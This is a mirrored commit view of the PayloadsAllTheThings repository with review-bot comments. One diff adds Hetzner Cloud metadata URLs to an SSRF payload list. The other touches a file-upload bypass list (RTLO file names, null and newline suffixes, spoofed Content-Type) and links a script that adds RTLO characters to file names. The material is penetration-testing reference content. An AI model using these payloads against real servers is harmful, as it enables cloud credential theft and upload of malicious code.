mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-09 15:56:15 +02:00

6 Commits

Author SHA1 Message Date
J-GainSec c42a6d126f
Merge 4f4d7b3bf5 into 293723d49d 2024-04-06 13:07:08 +04:00
Swissky 293723d49d
Merge pull request #712 from bsysop/patch-4
Adding "Hetzner Cloud" to the Summary
2024-04-05 18:55:52 +02:00
bsysop dc461f170e
Adding "Hetzner Cloud" to the Summary 2024-04-05 11:55:54 -03:00
Swissky 9571306b9f
Merge pull request #711 from bsysop/patch-3
Adding Hetzner Cloud Metadata URL
2024-04-05 15:53:05 +02:00
bsysop 3c9fdec3da
Adding Hetzner Cloud Metadata URL
https://docs.hetzner.cloud/#server-metadata
2024-04-04 23:43:34 -03:00
J-GainSec 4f4d7b3bf5
Added Link to Python Script for adding RTLO characters to strings, individual files or all files within a directory. 2024-03-01 23:36:14 -05:00
2 changed files with 15 additions and 2 deletions


@ -52,6 +52,7 @@
* [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
* [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
* [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
* [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud)
* [SSRF URL for Docker](#ssrf-url-for-docker)
* [SSRF URL for Rancher](#ssrf-url-for-rancher)
@ -805,6 +806,18 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
### SSRF URL for Hetzner Cloud
```powershell
http://169.254.169.254/hetzner/v1/metadata
http://169.254.169.254/hetzner/v1/metadata/hostname
http://169.254.169.254/hetzner/v1/metadata/instance-id
http://169.254.169.254/hetzner/v1/metadata/public-ipv4
http://169.254.169.254/hetzner/v1/metadata/private-networks
http://169.254.169.254/hetzner/v1/metadata/availability-zone
http://169.254.169.254/hetzner/v1/metadata/region
```
### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
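Review bot: The new Hetzner Cloud section gives only the URL list, with no sentence on what the endpoint returns, whereas the neighbouring Kubernetes ETCD section opens with one ("Can contain API keys and internal ip and ports"). Add a one-line description under the heading, and include the documentation link from the commit message (https://docs.hetzner.cloud/#server-metadata) so readers can verify the paths. The fence is also tagged `powershell` although the block holds plain URLs; keep that tag only if it matches the one used by the other metadata blocks in this file.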


@ -80,7 +80,7 @@
* `file.php%20`
* `file.php%0d%0a.jpg`
* `file.php%0a`
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. - [Automated Script for RTLO](https://github.com/GainSec/RTLOify)
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
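Review bot: On the changed RTLO bullet, the tool link is tacked on after the sentence's closing period with ` - `, which none of the surrounding bullets do, and the line still reads "will became" even though it is being touched. Suggest correcting the wording to "will become" and either folding the link into the sentence or moving it to the References section, with a few words on what the script does (the commit message says it adds RTLO characters to strings, individual files or all files within a directory).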
@ -219,4 +219,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
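Review bot: The final reference line (PHP Internals Book) is removed and re-added with identical visible text, so this hunk looks like an end-of-file newline or whitespace change only. If that is unintended editor churn, drop it from the commit so the diff contains just the RTLO link change.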